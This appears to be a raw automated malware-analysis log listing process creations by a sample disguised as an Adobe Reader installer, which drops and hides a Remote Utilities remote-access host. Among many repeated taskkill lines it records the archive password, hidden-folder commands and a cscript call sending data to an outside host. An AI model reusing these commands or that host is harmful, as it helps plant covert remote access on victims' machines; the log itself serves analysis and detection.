Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE21F6.tmp.bat' '
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\EXE23CE.tmp.bat' '
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe'
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process created: C:\inst_fold\7zaa.exe 'C:\inst_fold\7zaa.exe' x -oC:\inst_fold -pdsiSDJJiojeflOSIOwp3#DSIJ23jeewE@_SDD_as2 C:\inst_fold\arm.7z
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process created: C:\inst_fold\fp.exe 'C:\inst_fold\fp.exe'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I /C '7zaa.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I /C 'armstall.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I /C 'rutserv.exe'
Source: C:\inst_fold\fp.exe	Process created: C:\inst_fold\armstart.exe 'C:\inst_fold\armstart.exe'
Source: C:\inst_fold\fp.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armgrd.bat' '
Source: C:\inst_fold\fp.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' '
Source: C:\inst_fold\fp.exe	Process created: C:\inst_fold\armforce.exe 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Source: C:\inst_fold\fp.exe	Process created: C:\inst_fold\armstatus.exe 'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js
Source: C:\inst_fold\armstart.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe 'C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe' /rsetup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript /nologo C:\inst_fold\armdaemon.js 'http://ca80628.tmweb.ru/f.php?data=000-000-000-000&id_k=1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
